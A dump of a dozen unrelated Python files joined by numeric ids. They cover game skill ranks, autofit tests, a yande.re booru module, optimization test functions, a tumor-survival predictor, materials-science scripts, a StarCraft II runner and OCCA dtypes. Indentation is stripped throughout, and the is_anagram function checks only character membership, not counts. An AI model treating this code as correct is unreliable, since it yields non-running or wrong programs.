m_rs = [weap_mid_rs, offhand_mid_rs, dodge_mid_rs]
m_rs.sort(reverse=True)
m_layer1 = m_rs[0] * 1
m_layer2 = m_rs[1] * 0.5
m_layer3 = m_rs[2] * 0.33
mid_def_rs = (m_layer1 + m_layer2 + m_layer3)
# Low Layer
l_rs = [weap_low_rs, offhand_low_rs, dodge_low_rs]
l_rs.sort(reverse=True)
l_layer1 = l_rs[0] * 1
l_layer2 = l_rs[1] * 0.5
l_layer3 = l_rs[2] * 0.33
low_def_rs = (l_layer1 + l_layer2 + l_layer3)
if rs_only:
return high_def_rs, mid_def_rs, low_def_rs
elif skills_only:
return high_skills, mid_skills, low_skills
else:
return high_skills, mid_skills, low_skills, high_def_rs, mid_def_rs, low_def_rs
def rs_stance(self, o_rs, d_rs, stance):
'''
o_rs = Offensive rank score
d_rs = Defensive rank score
Berserk - Attack 100% | Defense: 0%
Aggressive - Attack 75% | Defense: 25%
Normal - Attack 50% | Defense: 50%
Wary - Attack 25% | Defense: 75%
Defensive - Attack 0% | Defense: 100%
'''
if stance == 'berserk':
o_rs = o_rs * 1
d_rs = d_rs * 0
return o_rs, d_rs
if stance == 'aggressive':
o_rs = o_rs * 0.75
d_rs = d_rs * 0.25
return o_rs, d_rs
if stance == 'normal':
o_rs = o_rs * 0.5
d_rs = d_rs * 0.5
return o_rs, d_rs
if stance == 'wary':
o_rs = o_rs * 0.25
d_rs = d_rs * 0.75
return o_rs, d_rs
if stance == 'defensive':
o_rs = o_rs * 0
d_rs = d_rs * 1
return o_rs, d_rs
def return_damage_type(self, skillset, skill):
if skillset in skillsets.VIABLE_SKILLSETS:
if skill in skillsets.skillsets[skillset]:
damage_type = skillsets.skillsets[skillset][skill]['damage_type']
return damage_type
def return_default_aim(self, skillset, skill):
if skillset in skillsets.VIABLE_SKILLSETS:
if skill in skillsets.skillsets[skillset]:
default_aim = skillsets.skillsets[skillset][skill]['default_aim']
return default_aim
def learn_skillset(self, skillset):
owner = self.owner
# Check if the skillset is not already learned and if not, create it.
if skillset not in self.skillset_dics:
self.generate_fresh_skillset(skillset)
owner.msg(f"You learn {skillset}.")
else:
owner.msg(f"You already know {skillset}!")
def generate_fresh_skillset(self, skillset, starting_rank=1):
owner = self.owner
starting_skillsets = skillsets.STARTING_SKILLSETS
base_dic = {'base ranks': starting_rank, 'bonus ranks': 0, 'current ap': 0}
owner.attributes.add(skillset, {**base_dic, **starting_skillsets[skillset]})
self.skillset_dics[skillset] = {**base_dic, **starting_skillsets[skillset]}
def grant_action_points(self, skillset):
owner = self.owner
if skillset in self.skillset_dics:
owner_skillset_saverdic = owner.attributes.get(skillset)
base_ranks = self.skillset_dics[skillset]['base ranks']
current_ap = self.skillset_dics[skillset]['current ap']
desired_rank = base_ranks + 1
ap_gain = self.generate_ap()
total_ap = current_ap + ap_gain
ap_req = self.ap_required(desired_rank)
if total_ap >= ap_req: # Level up!
ap_diff = total_ap - ap_req
owner_skillset_saverdic['current ap'] = ap_diff
self.skillset_dics[skillset]['current ap'] = ap_diff
owner_skillset_saverdic['base ranks'] = base_ranks + 1
self.skillset_dics[skillset]['base ranks'] = base_ranks + 1
owner.msg(f"You have reached the base rank of {self.skillset_dics[skillset]['base ranks']} in {skillset}!")
else:
owner_skillset_saverdic['current ap'] = total_ap
self.skillset_dics[skillset]['current ap'] = total_ap
owner.msg(f"You have gained {ap_gain} AP toward your {skillset} skillset with {ap_req - total_ap} AP remaining to level.")
def return_skill_rank(self, skillset, skill):
"""
Looks to see if the owner posesses a specified skillset.
Generates a dictionary specific to that skillset and adds the base and bonus ranks.
Uses the total skillset ranks as a base rank for the skill.
Final skill rank is a result of the skill rank added to the total skillset ranks.
"""
skill_rank = 0
if skillset in self.skillset_dics:
skillset_dic = self.skillset_dics[skillset]
skillset_base_rank = skillset_dic['base ranks']
skillset_bonus_rank = skillset_dic['bonus ranks']
skillset_rank = skillset_base_rank + skillset_bonus_rank
if skill in skillset_dic:
skill_bonus_rank = skillset_dic[skill]
skill_rank = skillset_rank + skill_bonus_rank
return skill_rank
def generate_skill_list(self):
"""
Desired Outcome
=====[Skills]=====================================
{skillset_name}
-------------------------------
Offense:
{skill_name} Rank: {rank} Rank Score: {rank_score}
Defense:
==================================================
"""
cap = str.capitalize
offense_skill_list = []
defense_skill_list = []
utility_skill_list = []
offense_rank_list = []
defense_rank_list = []
utility_rank_list = []
offense_skill_base_rank_list = []
defense_skill_base_rank_list = []
utility_skill_base_rank_list = []
offense_skill_bonus_rank_list = []
defense_skill_bonus_rank_list = []
utility_skill_bonus_rank_list = []
offense_rank_score_list = []
defense_rank_score_list = []
utility_rank_score_list = []
offense_skill_string_list = []
defense_skill_string_list = []
utility_skill_string_list = []
skillset_string_list = []
skill_base_rank = 0
skill_bonus_rank = 0
skill_rank = 0
skill_rank_score = 0.0
skill_difficulty = ''
num = 0
offense_skill_string = ""
defense_skill_string = ""
utility_skill_string = ""
full_skillsets_string = ""
header = "=====[|gSkills|n]====================================="
footer = "=================================================="
for i in skillsets.VIABLE_SKILLSETS:
# We reset the skill lists at the start of each new skillset iteration.
offense_skill_string = ""
defense_skill_string = ""
utility_skill_string = ""
offense_skill_list = []
defense_skill_list = []
utility_skill_list = []
offense_rank_list = []
defense_rank_list = []
utility_rank_list = []
offense_skill_base_rank_list = []
defense_skill_base_rank_list = []
utility_skill_base_rank_list = []
offense_skill_bonus_rank_list = []
defense_skill_bonus_rank_list = []
utility_skill_bonus_rank_list = []
offense_rank_score_list = []
defense_rank_score_list = []
utility_rank_score_list = []
offense_skill_string_list = []
defense_skill_string_list = []
utility_skill_string_list = []
if i in self.skillset_dics: # If the skillset exists on the character.
base_ranks = self.skillset_dics[i]['base ranks']
bonus_ranks = self.skillset_dics[i]['bonus ranks']
skill_base_rank = base_ranks + bonus_ranks
current_ap = self.skillset_dics[i]['current ap']
next_rank_ap_req = self.ap_required(base_ranks + 1)
ap_remaining = next_rank_ap_req - current_ap
# Build skill lists
for x in skillsets.VIABLE_SKILLS:
if x in self.skillset_dics[i]: # If the skill exists on the character.
skill_bonus_rank = self.skillset_dics[i][x] # Store that skill's bonus
skill_rank = self.return_skill_rank(i, x)
skill_difficulty = skillsets.skillsets[i][x]['difficulty']
skill_rank_score = self.return_rank_score(skill_rank, skill_difficulty)
# Store the skill's name in a list, sorted by skill type.
if skillsets.skillsets[i][x]['skill_type'] == 'offense':
offense_skill_list.append(x)
offense_skill_base_rank_list.append(skill_base_rank)
offense_skill_bonus_rank_list.append(skill_bonus_rank)
offense_rank_list.append(skill_rank)
offense_rank_score_list.append(skill_rank_score)
elif skillsets.skillsets[i][x]['skill_type'] == 'defense':
defense_skill_list.append(x)
defense_skill_base_rank_list.append(skill_base_rank)
defense_skill_bonus_rank_list.append(skill_bonus_rank)
defense_rank_list.append(skill_rank)
defense_rank_score_list.append(skill_rank_score)
elif skillsets.skillsets[i][x]['skill_type'] == 'utility':
utility_skill_list.append(x)
utility_skill_base_rank_list.append(skill_base_rank)
utility_skill_bonus_rank_list.append(skill_bonus_rank)
utility_rank_list.append(skill_rank)
utility_rank_score_list.append(skill_rank_score)
# Build this skillset's string.
skillset_title = (f"\n\n|g{cap(i)}|n - Base Ranks: |g{base_ranks}|n Bonus Ranks: |g{bonus_ranks}|n\n"
f"Current ap: {current_ap} Rank {base_ranks + 1} AP Requirement: {next_rank_ap_req} Required AP Remaining: |c{ap_remaining}|n\n"
"--------------------------------------------------")
num = 0
for v in offense_skill_list:
offense_skill_string_list.append(f"|G{cap(v)}|n Base Rank: |G{offense_skill_base_rank_list[num]}|n Bonus Ranks: |G{offense_skill_bonus_rank_list[num]}|n Rank: |G{offense_rank_list[num]}|n Rank Score: |G{offense_rank_score_list[num]}|n\n")
num += 1
if len(offense_skill_string_list) > 0:
offense_skill_string = f"\nOffense:\n{''.join(offense_skill_string_list)}"
num = 0
for v in defense_skill_list:
defense_skill_string_list.append(f"|G{cap(v)}|n Base Rank: |G{defense_skill_base_rank_list[num]}|n Bonus Ranks: |G{defense_skill_bonus_rank_list[num]}|n Rank: |G{defense_rank_list[num]}|n Rank Score: |G{defense_rank_score_list[num]}|n\n")
num += 1
if len(defense_skill_string_list) > 0:
defense_skill_string = f"\nDefense:\n{''.join(defense_skill_string_list)}"
num = 0
for v in utility_skill_list:
utility_skill_string_list.append(f"|G{cap(v)}|n Base Rank: |G{utility_skill_base_rank_list[num]}|n Bonus Ranks: |G{utility_skill_bonus_rank_list[num]}|n Rank: |G{utility_rank_list[num]}|n Rank Score: |G{utility_rank_score_list[num]}|n\n")
num += 1
if len(utility_skill_string_list) > 0:
utility_skill_string = f"\nUtility:\n{''.join(utility_skill_string_list)}"
skillset_string_list.append(f"{skillset_title}{offense_skill_string}{defense_skill_string}{utility_skill_string}")
# Now we compile the final list.
full_skillsets_string = ''.join(skillset_string_list)
# Current total defensive rank scores.
high_def_rs, mid_def_rs, low_def_rs = self.defense_layer_calc(rs_only=True)
def_rs = f"\n\nCurrent total defensive RS - High: {high_def_rs} Mid: {mid_def_rs} Low: {low_def_rs}\n"
result = f"{header}{full_skillsets_string}{def_rs}\n{footer}"
return result
|
486988
|
import pytest
import autofit as af
from autofit import database as db
@pytest.fixture(
name="gaussian_0"
)
def make_gaussian_0(
session
):
gaussian_0 = db.Fit(
id="gaussian_0",
instance=af.Gaussian(
centre=1
),
info={"info": 1},
is_complete=True,
unique_tag="zero"
)
session.add(gaussian_0)
session.commit()
return gaussian_0
def test_order_by(
aggregator,
gaussian_1,
gaussian_2,
gaussian_0
):
assert aggregator.order_by(
aggregator.search.unique_tag
) == [gaussian_1, gaussian_2, gaussian_0]
def test_reversed(
aggregator,
gaussian_1,
gaussian_2,
gaussian_0
):
assert aggregator.order_by(
aggregator.search.unique_tag,
reverse=True
) == [gaussian_0, gaussian_2, gaussian_1]
def test_boolean(
aggregator,
gaussian_1,
gaussian_2
):
assert aggregator.order_by(
aggregator.search.is_complete
) == [gaussian_2, gaussian_1]
assert aggregator.order_by(
aggregator.search.is_complete,
reverse=True
) == [gaussian_1, gaussian_2]
def test_combined(
aggregator,
gaussian_1,
gaussian_2,
gaussian_0
):
assert aggregator.order_by(
aggregator.search.is_complete
).order_by(
aggregator.search.unique_tag
) == [gaussian_2, gaussian_1, gaussian_0]
|
487011
|
from ..base import Mod
from ..mixins import (
ViewMixin,
make_blueprint_mixin,
IdentityGuessNameMixin,
make_field_guess_name_mixin
)
from ..booru.mixins import BooruMixin
name = 'yandere'
class Yandere(
ViewMixin,
BooruMixin,
make_blueprint_mixin(__name__),
make_field_guess_name_mixin('uri', 'query'),
IdentityGuessNameMixin,
Mod
):
name = name
display_name = 'yande.re'
has_advanced_search = False
description = '二次元高清图站, 订阅链接或关键字, 第一时间收图.'
normal_search_prompt = '订阅地址/tags'
allow_empty_query = True
posts_url = 'https://yande.re/post'
post_uri_template = 'https://yande.re/post/show/{}'
referer = 'https://yande.re/'
frontend_need_init = True
@property
def carousel(self):
from flask import url_for
return url_for("main.example_search", kind=name, q="https://yande.re/post?tags=rating%3As")
@staticmethod
def tags(post):
return post.tags
@staticmethod
def preview_url(post):
return post.preview_url
@property
def frontend_options(self):
from flask import url_for
from ...core.local import get_current_conf
return {
'completion_options_uri': url_for("main.completion_options", kind=name),
'completion_cache_timeout': get_current_conf()['TORABOT_MOD_YANDERE_COMPLETION_CACHE_TIMEOUT']
}
@property
def completion_options(self):
import json
from ...core.backends.redis import Redis
from ...core.local import get_current_conf
from ..query import query
q = query(
kind=name,
text=json.dumps(dict(method='tags')),
timeout=get_current_conf()['TORABOT_SPY_TIMEOUT'],
sync_on_expire=False,
make_backend=lambda conn: Redis()
)
if not q:
raise Exception('get completion of danbooru failed')
return q.content
def spy(self, query, timeout):
from ..booru.query import parse, regular
if parse(query).method == 'tags':
spy = super(BooruMixin, self).spy
else:
spy = super(Yandere, self).spy
return spy(regular(query), timeout)
def changes(self, old, new, **kargs):
if new.query.method == 'tags':
return
yield from super(Yandere, self).changes(old, new)
def sync_on_expire(self, query):
from ..booru.query import parse
return parse(query.text).method != 'tags'
def regular(self, query_text):
from ..booru.query import regular
return self.name, regular(query_text)
|
487014
|
def is_anagram(a, b):
for c in a:
if c not in b:
return False
for c in b:
if c not in a:
return False
return True
print is_anagram("apple", "palpe")
print is_anagram("applex", "palpe")
|
487052
|
import numpy
__all__ = [
"ackley",
"griewank",
"quartic",
"rastrigin",
"rosenbrock",
"sphere",
"styblinski_tang",
]
def ackley(x):
"""
The Ackley function.
Parameters
----------
x : array_like
1-D array of points at which the Ackley function is to be computed.
Returns
-------
float
The value of the Ackley function.
"""
x = numpy.asarray(x)
ndim = x.size
e = 2.7182818284590451
sum1 = numpy.sqrt(1.0 / ndim * numpy.square(x).sum())
sum2 = 1.0 / ndim * numpy.cos(2.0 * numpy.pi * x).sum()
return 20.0 + e - 20.0 * numpy.exp(-0.2 * sum1) - numpy.exp(sum2)
def griewank(x):
"""
The Griewank function.
Parameters
----------
x : array_like
1-D array of points at which the Griewank function is to be computed.
Returns
-------
float
The value of the Griewank function.
"""
x = numpy.asarray(x)
ndim = x.size
sum1 = numpy.square(x).sum() / 4000.0
prod1 = numpy.prod(numpy.cos(x / numpy.sqrt(numpy.arange(1, ndim + 1))))
return 1.0 + sum1 - prod1
def quartic(x):
"""
The Quartic function.
Parameters
----------
x : array_like
1-D array of points at which the Quartic function is to be computed.
Returns
-------
float
The value of the Quartic function.
"""
x = numpy.asarray(x)
ndim = x.size
return (numpy.arange(1, ndim + 1) * numpy.power(x, 4)).sum()
def rastrigin(x):
"""
The Rastrigin function.
Parameters
----------
x : array_like
1-D array of points at which the Rastrigin function is to be computed.
Returns
-------
float
The value of the Rastrigin function.
"""
x = numpy.asarray(x)
ndim = x.size
sum1 = (numpy.square(x) - 10.0 * numpy.cos(2.0 * numpy.pi * x)).sum()
return 10.0 * ndim + sum1
def rosenbrock(x):
"""
The Rosenbrock function.
Parameters
----------
x : array_like
1-D array of points at which the Rosenbrock function is to be computed.
Returns
-------
float
The value of the Rosenbrock function.
"""
x = numpy.asarray(x)
sum1 = ((x[1:] - x[:-1] ** 2) ** 2).sum()
sum2 = numpy.square(1.0 - x[:-1]).sum()
return 100.0 * sum1 + sum2
def sphere(x):
"""
The Sphere function.
Parameters
----------
x : array_like
1-D array of points at which the Sphere function is to be computed.
Returns
-------
float
The value of the Sphere function.
"""
return numpy.square(x).sum()
def styblinski_tang(x):
"""
The Styblinski-Tang function.
Parameters
----------
x : array_like
1-D array of points at which the Styblinski-Tang function is to be computed.
Returns
-------
float
The value of the Styblinski-Tang function.
"""
x = numpy.asarray(x)
sum1 = (numpy.power(x, 4) - 16.0 * numpy.square(x) + 5.0 * x).sum()
return 0.5 * sum1 + 39.16599 * x.size
|
487063
|
OPEN = 'Open'
IN_PROGRESS = 'In Progress'
DUE_SOON = 'Due Soon'
OVERDUE = 'Overdue'
CLOSED = 'Closed'
|
487095
|
import logging
def get_logger(level: int = logging.DEBUG) -> logging.Logger:
logger = logging.getLogger("awscliv2")
if logger.handlers:
return logger
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(
logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
)
stream_handler.setLevel(level)
logger.addHandler(stream_handler)
logger.setLevel(level)
return logger
|
487120
|
import SimpleITK
from keras.models import load_model
from util_3d import *
import sys
'''
Parameters
encodedPrediction - the one hot encoded label to use to predict
labels - labels for the prediction
Transform encodedPredictions to a dictionary of labeled data
'''
def getLabelPrediction(encodedPrediction, labels=['Less than 250 Days', '250 to 500 Days', 'More than 500 Days']):
formattedLabels = []
numberOfLabels = len(encodedPrediction[0])
for index in range(0, numberOfLabels):
formattedLabels.append("%.2f" % round((encodedPrediction[0][index] * 100), 2))
labelPrediction = {}
for index in range(0, len(labels)):
labelPrediction[labels[index]] = formattedLabels[index]
print(labelPrediction)
return labelPrediction
'''
Parameters
model_filepath - location of the trained model
tumor_img_filepath - location of the datafile
Trim and reshape tumor img
Get encoded prediction of labels based off model
'''
def getEncodedPrediction(model_filepath, tumor_img_filepath, dim=(50,80,80)):
model = load_model(model_filepath)
input_image = SimpleITK.ReadImage(tumor_img_filepath)
rawArray = SimpleITK.GetArrayFromImage(input_image)
trimmedArray = trim_array_3d(rawArray, dim)
img_depth = len(trimmedArray)
img_cols = len(trimmedArray[0])
img_rows = len(trimmedArray[0][0])
nb_channels = 1
nb_samples = 1
inputData = trimmedArray.reshape(nb_samples, img_depth, img_cols, img_rows, nb_channels)
encodedPrediction = model.predict(inputData)
print(encodedPrediction)
return encodedPrediction
'''
Parameters
model_filepath - location of the trained model
tumor_img_filepath - location of the datafile
'''
if __name__ == "__main__":
model_filepath = sys.argv[1]
tumor_img_filepath = sys.argv[2]
encodedPrediction = getEncodedPrediction(model_filepath, tumor_img_filepath)
labelPrediction = getLabelPrediction(encodedPrediction)
|
487166
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import math
#Reads deformations.txt, generated via
#`casm query -k 'struc_score(PRIM,basis_score)' 'struc_score(PRIM,lattice_score)' 'struc_score(../NiAl-B2/PRIM-true.vasp,basis_score)' 'struc_score(../NiAl-B2/PRIM-true.vasp,lattice_score)' 'struc_score(../NiAl-HCP/PRIM,basis_score)' 'struc_score(../NiAl-HCP/PRIM,lattice_score)' relaxation_strain comp atom_frac -c selections/enumerated.json -o deformations.txt`
#Load everything as a string
stringdump=np.genfromtxt("./deformations.txt", dtype="S25")
names=stringdump[:,0]
#Recast data as float
datadump=np.array(stringdump[:,2:-1],dtype=float)
#take views of relevant columns
FCCscore=datadump[:,0]+datadump[:,1]
BCCscore=datadump[:,2]+datadump[:,3]
HCPscore=datadump[:,4]+datadump[:,5]
E11=datadump[:,6]
E22=datadump[:,7]
E33=datadump[:,8]
#Calculate strain order parameters
eta3=-(E11+E22-2*E33)/math.sqrt(6)
eta2=(E11-E22)/math.sqrt(2)
etadump=np.vstack((names,eta2,eta3)).T
np.savetxt("etadump.txt",etadump,fmt="%s")
etamat=np.array([eta2,eta3]).T
#Bin structures by type of PRIM
scoremat=np.vstack((FCCscore,BCCscore,HCPscore)).T
bestscore=np.array([np.argmin(row) for row in scoremat]) #0=FCC. 1=BCC, 2=HCP
#Write the scores out for each structure
strucscores=np.vstack((names,bestscore.astype(str))).T
np.savetxt("./strucscores.txt", strucscores,fmt="%s")
colordict={0:'r',1:'g',2:'b'}
colorscore=[]
for score in bestscore:
colorscore.append(colordict[score])
#Apply symmetry to strain order parameters
mirrortrans=np.array([[-1,0],[0,1]])
rottrans=np.array([[-0.5, -0.5*math.sqrt(3)],[0.5*math.sqrt(3),-0.5]])
etarotmat1=np.dot(etamat,rottrans)
etarotmat2=np.dot(etarotmat1,rottrans)
etarotmat=np.vstack((etamat,etarotmat1,etarotmat2))
etamirrormat=np.dot(etarotmat,mirrortrans)
redundantcolorscore=np.array(3*colorscore)
#Specify maximum radius in eta space to get configurations from
#maxrad=0.085
#radmat=np.sqrt(eta2*eta2+eta3*eta3)
#centeredidx=[radmat < maxrad]
#plot that shit yo
fig=plt.figure()
ax=fig.add_subplot('111')
#plot symmetrized metrics
ax.scatter(etamirrormat[:,0],etamirrormat[:,1],color=redundantcolorscore,edgecolors='gray',s=50,alpha=0.5)
ax.scatter(etarotmat[:,0],etarotmat[:,1],color=redundantcolorscore,edgecolors='gray',s=50,alpha=0.5)
#plot original data
ax.scatter(eta2,eta3,s=50,edgecolors='k',color=colorscore)
ax.set_aspect('equal')
ax.set_xlim([-0.3,0.3])
ax.set_ylim([-0.3,0.3])
ax.set_xlabel(r"$\mathrm{e_2}$")
ax.set_ylabel(r"$\mathrm{e_3}$")
ax.set_title(r"\textbf{FCC strain relaxations}")
red_patch = mpatches.Patch(color='red', label=r'\textbf{FCC}')
green_patch = mpatches.Patch(color='green', label=r'\textbf{BCC}')
blue_patch = mpatches.Patch(color='blue', label=r'\textbf{HCP}')
ax.legend(handles=[red_patch,green_patch,blue_patch],prop={'size':12},loc="upper left")
plt.tight_layout()
plt.show()
#Save the configurations that are FCC
FCCindx=[(bestscore==0)]
FCCnames=names[FCCindx]
FCCfiltered=np.array(FCCscore[FCCindx],dtype="S25")
FCCdump=np.vstack((FCCnames,FCCfiltered)).T
np.savetxt("FCC_scores.txt",FCCdump,fmt="%s")
#Save the configurations that are BCC
BCCindx=[(bestscore==1)]
BCCnames=names[BCCindx]
BCCfiltered=np.array(BCCscore[BCCindx],dtype="S25")
BCCdump=np.vstack((BCCnames,BCCfiltered)).T
np.savetxt("BCC_scores.txt",BCCdump,fmt="%s")
#Save the configurations that are HCP
HCPindx=[(bestscore==2)]
HCPnames=names[HCPindx]
HCPfiltered=np.array(HCPscore[HCPindx],dtype="S25")
HCPdump=np.vstack((HCPnames,HCPfiltered)).T
np.savetxt("HCP_scores.txt",HCPdump,fmt="%s")
|
487168
|
from pathlib import Path
from sc2 import maps
from sc2.data import Race
from sc2.main import GameMatch, run_multiple_games
from sc2.player import BotProcess, Computer
def main():
run_multiple_games(
[
GameMatch(
maps.get("AcropolisLE"),
[
# Enable up to 2 of the 4 following bots to test this file
# Assuming you launch external_bot.py from the root directory of 'python-sc2'
BotProcess(
Path.cwd(),
["python", "examples/competitive/run.py"],
Race.Terran,
"CompetiveBot",
stdout="temp.txt",
),
# Bot(Race.Zerg, ZergRushBot()),
# Bot(Race.Zerg, ZergRushBot()),
Computer(Race.Zerg),
],
realtime=True,
),
]
)
if __name__ == "__main__":
main()
|
487184
|
import os
import time
import numpy as np
from pychemia import pcm_log
from pychemia.code import Relaxator
from pychemia.crystal import KPoints
from ..dftb import DFTBplus, read_detailed_out, read_dftb_stdout, read_geometry_gen
try:
from pychemia.symm import symmetrize
except ImportError:
def symmetrize(structure):
return structure
INITIAL_SCORE = -25
class Relaxation(Relaxator):
def __init__(self, structure, relaxator_params=None, workdir='.', kpoints=None, target_forces=1E-3, waiting=False,
kp_density=10000, forced=True):
self.workdir = workdir
self.initial_structure = structure
self.slater_path = None
self.symmetrize = False
self.forced = forced
if relaxator_params is None:
relaxator_params = {'slater_path': '.'}
self.set_params(relaxator_params)
if self.symmetrize:
self.initial_structure = symmetrize(structure)
self.structure = self.initial_structure.copy()
self.waiting = waiting
if kpoints is None:
self.kpoints = KPoints.optimized_grid(self.structure.lattice, kp_density=kp_density)
else:
self.kpoints = kpoints
Relaxator.__init__(self, target_forces)
def set_params(self, params):
assert (isinstance(params, dict))
if 'slater_path' not in params:
params['slater_path'] = '.'
if isinstance(params['slater_path'], str):
assert os.path.exists(params['slater_path'])
self.slater_path = [params['slater_path']]
else:
self.slater_path = params['slater_path']
try:
for x in self.slater_path:
assert os.path.exists(x)
except TypeError:
raise ValueError('Missing a valid slater_path or list of slater_paths')
if 'symmetrize' in params and params['symmetrize'] is True:
self.symmetrize = True
def run(self):
irun = 0
score = INITIAL_SCORE
dftb = DFTBplus(workdir=self.workdir)
dftb.initialize(structure=self.structure, kpoints=self.kpoints)
dftb.set_slater_koster(search_paths=self.slater_path)
dftb.basic_input()
dftb.driver['LatticeOpt'] = False
# Decreasing the target_forces to avoid the final static
# calculation of raising too much the forces after symmetrization
dftb.driver['MaxForceComponent'] = self.target_forces
dftb.driver['ConvergentForcesOnly'] = True
dftb.driver['MaxSteps'] = 100
dftb.hamiltonian['MaxSCCIterations'] = 20
dftb.set_inputs()
print('Launching DFTB+ with target force of %9.2E ' % dftb.driver['MaxForceComponent'])
dftb.run()
if self.waiting:
dftb.runner.wait()
while True:
if dftb.runner is not None and dftb.runner.poll() is not None:
pcm_log.info('Execution completed. Return code %d' % dftb.runner.returncode)
stdo = read_dftb_stdout(filename=self.workdir + os.sep + 'dftb_stdout.log')
good_forces, good_stress = self.relaxation_status()
if 'max_force' in stdo:
print('Converged: %s\t Max Force: %9.3e\t MaxForceComponent: %9.3e' % (stdo['ion_convergence'],
stdo['max_force'],
self.target_forces))
filename = dftb.workdir + os.sep + 'detailed.out'
if not os.path.exists(filename):
pcm_log.error('Could not find ' + filename)
break
if not good_forces and not good_stress:
# This happens when all the SCC are completed without convergence
dftb.driver['ConvergentForcesOnly'] = False
else:
dftb.driver['ConvergentForcesOnly'] = True
score = self.quality(score)
pcm_log.debug('Score : %d Good Forces: %s Good Stress: %s' % (score, good_forces, good_stress))
if score < 0:
if good_forces and good_stress:
pcm_log.debug('Convergence: Internals + Cell')
dftb.driver['MovedAtoms'] = '1:-1'
dftb.driver['LatticeOpt'] = True
elif not good_forces and good_stress:
pcm_log.debug('Convergence: Internals')
dftb.driver['LatticeOpt'] = False
dftb.driver['MovedAtoms'] = '1:-1'
elif good_forces and not good_stress:
pcm_log.debug('Convergence: Internals + Cell')
dftb.driver['LatticeOpt'] = True
dftb.driver['MovedAtoms'] = '1:-1'
dftb.structure = read_geometry_gen(dftb.workdir + os.sep + 'geo_end.gen')
# lets change the positions if the score have lowered to -10
if score == -10 and self.forced:
dftb.structure.positions += 0.2 * np.random.rand(dftb.structure.natom, 3) - 0.1
dftb.structure.positions2reduced()
dftb.structure.set_cell(1.1 * dftb.structure.cell)
if score == -1 and self.forced:
dftb.structure = dftb.structure.random_cell(dftb.structure.composition)
print('RANDOM STRUCTURE')
print(dftb.structure)
score = INITIAL_SCORE
dftb.structure.save_json(dftb.workdir + os.sep + 'structure_current.json')
if self.symmetrize:
dftb.structure = symmetrize(dftb.structure)
self.structure = dftb.structure
dftb.get_geometry()
dftb.roll_outputs(irun)
dftb.set_inputs()
irun += 1
print('Launching DFTB+ with target force of %9.2E ' % dftb.driver['MaxForceComponent'])
dftb.run()
if self.waiting:
dftb.runner.wait()
else:
pcm_log.debug('Final static calculation')
dftb.structure = self.get_final_geometry()
dftb.structure.save_json(dftb.workdir + os.sep + 'structure_final.json')
if self.symmetrize:
dftb.structure = symmetrize(dftb.structure)
self.structure = dftb.structure
dftb.get_geometry()
dftb.roll_outputs(irun)
dftb.options['CalculateForces'] = True
dftb.driver = {}
dftb.set_inputs()
print('Launching DFTB+ with static evaluation of forces ')
dftb.run()
if self.waiting:
dftb.runner.wait()
while dftb.runner.poll() is None:
dftb.run_status()
time.sleep(10)
print('Completed Static run')
forces, stress, total_energy = self.get_forces_stress_energy()
if stress is None or forces is None or total_energy is None:
pcm_log.debug('Null Forces, Stress or Energy, relaxing and exiting')
dftb.basic_input()
dftb.driver['LatticeOpt'] = False
# Decreasing the target_forces to avoid the final static
# calculation of raising too much the forces after symmetrization
dftb.driver['MaxForceComponent'] = 0.9 * self.target_forces
dftb.driver['ConvergentForcesOnly'] = False
dftb.driver['MaxSteps'] = 10
dftb.hamiltonian['MaxSCCIterations'] = 50
print(dftb.driver)
dftb.set_inputs()
dftb.run()
if self.waiting:
dftb.runner.wait()
while dftb.runner.poll() is None:
time.sleep(10)
print('FINAL:', read_detailed_out(filename=filename))
forces, stress, total_energy = self.get_forces_stress_energy()
if stress is None or forces is None or total_energy is None:
pcm_log.debug('Again Null Forces, Stress or Energy, Randomizing Structure')
dftb.structure = dftb.structure.random_cell(dftb.structure.composition)
print('RANDOM STRUCTURE')
print(dftb.structure)
score = INITIAL_SCORE
else:
break
else:
break
else:
pcm_log.debug('ID: %s' % os.path.basename(self.workdir))
filename = dftb.workdir + os.sep + 'dftb_stdout.log'
if os.path.exists(filename):
stdo = read_dftb_stdout(filename=filename)
print('Number of steps:', len(stdo['Geometry_Steps']))
if len(stdo['Geometry_Steps']) > 1:
line = 'Energy behavior: '
prev_energy = stdo['Geometry_Steps'][0]['Total Energy']['value']
line += ' %7.3f ' % prev_energy
for step in stdo['Geometry_Steps'][1:]:
new_energy = step['Total Energy']['value']
if prev_energy > new_energy:
line += '>'
else:
line += '<'
prev_energy = new_energy
finene = stdo['Geometry_Steps'][-1]['Total Energy']['value']
line += ' %7.3f' % finene
print(line)
time.sleep(10)
def quality(self, score):
good_forces, good_stress = self.relaxation_status()
if good_forces and good_stress:
print('Finished with forces and stress under target_forces')
score = 0
elif good_forces:
print('Finished with forces under target_forces (not stress)')
score = score
else:
# Increase the score on each iteration
score += 1
if self.structure.density < 0.1:
print('Very small density = Bad Structure')
score = -1
return score
def get_forces_stress_energy(self):
filename = self.workdir + os.sep + 'detailed.out'
if os.path.isfile(filename):
ret = read_detailed_out(filename=filename)
forces = ret['forces']
stress = ret['stress']
total_energy = ret['total_energy']
else:
forces = None
stress = None
total_energy = None
return forces, stress, total_energy
def get_final_geometry(self):
geometry = self.workdir + os.sep + 'geo_end.gen'
if os.path.isfile(geometry):
return read_geometry_gen(geometry)
else:
# For static calculations the 'geo_end.gen' is not generated
# returning the internal structure
return self.structure
|
487191
|
import json
import numpy as np
from . import c, utils
__DTYPE_CACHE = None
def get_occa_dtype(dtype):
global __DTYPE_CACHE
if not __DTYPE_CACHE:
__DTYPE_CACHE = get_dtype_cache()
# Make sure we have a numpy dtype
dtype = np.dtype(dtype)
occa_dtype = __DTYPE_CACHE.get(dtype)
if occa_dtype is None:
occa_dtype = c.dtype(json=dtype_to_json(dtype))
__DTYPE_CACHE[dtype] = occa_dtype
return occa_dtype
def dtype_to_json(dtype, **kwargs):
return json.dumps(dtype_to_obj(dtype), **kwargs)
def dtype_to_obj(dtype):
# dtype tuple (np.float32, (2,2))
if dtype.shape:
count = 1
for n in dtype.shape:
count *= n
[subdtype, *_] = dtype.subdtype
return [dtype_to_obj(subdtype), count]
# dtype(np.float32)
if not dtype.fields:
return utils.TYPES_TO_C_TYPES[dtype.type]
# dtype([...])
return [
[field, dtype_to_obj(field_dtype)]
for field, [field_dtype, *_] in dtype.fields.items()
]
def get_dtype_cache():
return {
np.dtype(np.bool_): c.dtype(builtin='bool'),
np.dtype(np.int8): c.dtype(builtin='int8'),
